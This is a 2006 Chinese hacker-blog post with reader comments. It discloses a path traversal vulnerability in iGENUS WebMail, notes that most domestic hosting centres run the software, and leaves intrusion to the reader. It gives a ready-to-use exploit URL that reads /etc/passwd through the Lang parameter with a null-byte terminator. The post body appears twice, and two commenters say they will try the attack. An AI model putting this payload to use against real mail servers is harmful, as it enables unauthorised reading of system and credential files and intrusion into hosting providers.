2006-02-26 02:52:00 by: h4x0r
iGENUS WebMail 致命漏洞
请使用者自行承担风险,与本作者无任何关系!
国内大部分IDC都是使用的iGENUS WebMail系统.关于如何入侵, 自己看者办。
漏洞利用:http://[WebMail地址]/?Lang=../../../../../../../../etc/passwd%00
直接爆出密码
对Liunx来说是致命的
漏洞说明:简单说一下主要是config_inc.php这文件里的有处地方没做过滤,导致可以从外部提交数据,获取信息!在以前的版本,就存在跨目录漏洞,漏洞并不是我发现的![[razz]](styles/default/images/smilies/icon_razz.gif)
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=614
国内大部分IDC都是使用的iGENUS WebMail系统.关于如何入侵, 自己看者办。
漏洞利用:http://[WebMail地址]/?Lang=../../../../../../../../etc/passwd%00
直接爆出密码
对Liunx来说是致命的
漏洞说明:简单说一下主要是config_inc.php这文件里的有处地方没做过滤,导致可以从外部提交数据,获取信息!在以前的版本,就存在跨目录漏洞,漏洞并不是我发现的
[Last Modified By h4x0r, at 2006-03-03 19:00:37]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=614
View Mode: |
Comments: 2
| Views: 756
EchoRise*
[ 2006-02-26 11:27:31 ]
顶,我试试先 ![[lol]](styles/default/images/smilies/icon_lol.gif)
ghost
[ 2006-03-07 12:16:20 ]
偶也玩玩看哦~~~~~~~~~呵呵~
